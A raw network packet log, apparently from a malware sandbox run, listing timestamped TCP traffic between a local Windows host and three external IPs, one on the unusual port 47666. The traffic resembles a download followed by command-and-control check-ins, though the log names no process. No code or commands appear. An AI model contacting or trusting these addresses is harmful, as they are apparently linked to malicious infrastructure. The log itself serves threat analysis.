                                                                                        Nov 20, 2024 07:53:13.244015932 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.244023085 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.244040012 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.244046926 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.244060040 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.244071960 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.244083881 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.244096041 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.244097948 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.244112015 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.244122028 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.244128942 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.332047939 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.332056999 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.332060099 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.332070112 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.332076073 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.332078934 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.332087994 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.332093000 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.332099915 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.332110882 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.332122087 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.332123041 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.332134962 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.332142115 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.332159996 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.332175016 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.376348972 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.376364946 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.376374960 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.376435041 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.376449108 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.376460075 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.376468897 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.376483917 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.376539946 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.416621923 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.416651011 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.416661024 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.416671991 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.416682959 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.416695118 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.416780949 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.416790009 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.416795015 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.416800022 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.416825056 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.416840076 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.416851997 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.416861057 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.416871071 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.416878939 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.416889906 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.416903973 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.416903973 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.416903973 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.416903973 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.416937113 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.416937113 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.416966915 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.416977882 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.416984081 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.416997910 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417007923 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417016983 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.417032003 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.417117119 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417126894 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417135954 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417145967 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417150974 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417154074 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.417155981 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417180061 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417190075 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417197943 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.417201042 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417213917 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.417256117 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.417283058 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417293072 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417303085 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417311907 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417320967 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.417324066 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417349100 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.417368889 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417423010 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417433023 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417443991 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417459965 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.417486906 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417490959 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.417496920 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417505980 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417515993 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417522907 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.417536020 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.417608023 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417617083 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417627096 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417638063 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417646885 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417650938 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.417658091 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417668104 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417675018 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.417679071 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417690039 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417699099 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.417715073 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.417730093 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.417763948 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417774916 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417784929 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417793036 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417804003 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.417829990 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.417856932 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417866945 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417876005 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417886019 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417897940 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417901993 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.417907000 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417917967 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.417934895 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.417963982 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.418029070 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418071985 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.418133020 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418143034 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418195009 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.418226957 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418236971 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418246031 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418256044 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418266058 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418276072 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418277979 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.418284893 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418297052 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418313980 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.418334961 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.418337107 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418346882 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418356895 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418365955 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418371916 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418376923 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.418390989 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418399096 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.418401003 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418438911 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.418545008 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418557882 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418569088 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418574095 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418579102 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418584108 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418610096 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418620110 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418756008 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418765068 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418767929 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.418776035 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418787956 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418796062 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418802977 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.418808937 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418813944 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418828964 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.418831110 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418842077 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418843031 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.418852091 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418859005 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.418879032 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418888092 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418893099 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418896914 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.418899059 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418925047 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.418940067 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418950081 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418960094 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.418992043 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.419001102 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.419002056 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921001911 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921040058 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921066046 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921072960 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921077967 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921087980 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921097994 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921108007 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921118975 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921125889 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921128988 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921139002 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921149015 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921156883 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921159983 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921170950 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921173096 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921181917 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921192884 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921211004 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921215057 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921225071 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921231031 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921236992 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921247959 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921247959 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921260118 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921269894 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921278954 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921281099 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921288013 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921298027 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921308041 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921309948 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921318054 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921327114 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921329975 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921340942 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921349049 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921360016 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921382904 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921387911 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921392918 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921420097 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921432972 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921433926 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921444893 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921454906 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921456099 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921468019 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921478033 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921485901 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921495914 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921498060 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921506882 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921518087 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921528101 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921538115 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921541929 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921550035 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921561956 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921570063 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921576977 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921591043 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921593904 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921602011 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921608925 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921617985 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921623945 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921628952 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921641111 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921652079 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921652079 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921665907 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921678066 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921679974 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921689034 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921700001 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921710014 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921720028 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921722889 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921730995 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921741962 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921746969 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921756983 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921768904 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921781063 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921781063 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921792030 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921802998 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921813011 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921813011 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921823025 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921835899 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921844959 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921845913 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921844959 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921854973 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921860933 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921873093 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.921886921 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.921917915 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.922012091 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:13.922029972 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:13.922056913 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:17.802838087 CET8049707216.172.172.178192.168.2.8
                                                                                        Nov 20, 2024 07:53:17.802902937 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:19.461368084 CET4970947666192.168.2.877.221.149.38
                                                                                        Nov 20, 2024 07:53:19.466176033 CET476664970977.221.149.38192.168.2.8
                                                                                        Nov 20, 2024 07:53:19.466253996 CET4970947666192.168.2.877.221.149.38
                                                                                        Nov 20, 2024 07:53:19.471998930 CET4970947666192.168.2.877.221.149.38
                                                                                        Nov 20, 2024 07:53:19.476793051 CET476664970977.221.149.38192.168.2.8
                                                                                        Nov 20, 2024 07:53:20.143476963 CET476664970977.221.149.38192.168.2.8
                                                                                        Nov 20, 2024 07:53:20.198467016 CET4970947666192.168.2.877.221.149.38
                                                                                        Nov 20, 2024 07:53:20.305665016 CET476664970977.221.149.38192.168.2.8
                                                                                        Nov 20, 2024 07:53:20.311702967 CET4970947666192.168.2.877.221.149.38
                                                                                        Nov 20, 2024 07:53:20.316664934 CET476664970977.221.149.38192.168.2.8
                                                                                        Nov 20, 2024 07:53:20.317198992 CET4970947666192.168.2.877.221.149.38
                                                                                        Nov 20, 2024 07:53:20.322073936 CET476664970977.221.149.38192.168.2.8
                                                                                        Nov 20, 2024 07:53:20.323347092 CET4970947666192.168.2.877.221.149.38
                                                                                        Nov 20, 2024 07:53:20.328242064 CET476664970977.221.149.38192.168.2.8
                                                                                        Nov 20, 2024 07:53:20.684839964 CET4970780192.168.2.8216.172.172.178
                                                                                        Nov 20, 2024 07:53:20.763988018 CET476664970977.221.149.38192.168.2.8
                                                                                        Nov 20, 2024 07:53:20.765754938 CET4970947666192.168.2.877.221.149.38
                                                                                        Nov 20, 2024 07:53:20.774068117 CET476664970977.221.149.38192.168.2.8
                                                                                        Nov 20, 2024 07:53:20.923408031 CET476664970977.221.149.38192.168.2.8
                                                                                        Nov 20, 2024 07:53:20.980813026 CET4970947666192.168.2.877.221.149.38
                                                                                        Nov 20, 2024 07:53:20.998640060 CET4971080192.168.2.8178.237.33.50
                                                                                        Nov 20, 2024 07:53:21.004007101 CET8049710178.237.33.50192.168.2.8
                                                                                        Nov 20, 2024 07:53:21.006541014 CET4971080192.168.2.8178.237.33.50
                                                                                        Nov 20, 2024 07:53:21.006829023 CET4971080192.168.2.8178.237.33.50
                                                                                        Nov 20, 2024 07:53:21.011687994 CET8049710178.237.33.50192.168.2.8
                                                                                        Nov 20, 2024 07:53:21.627352953 CET8049710178.237.33.50192.168.2.8
                                                                                        Nov 20, 2024 07:53:21.628365040 CET4971080192.168.2.8178.237.33.50
                                                                                        Nov 20, 2024 07:53:21.923235893 CET4970947666192.168.2.877.221.149.38
                                                                                        Nov 20, 2024 07:53:21.928116083 CET476664970977.221.149.38192.168.2.8
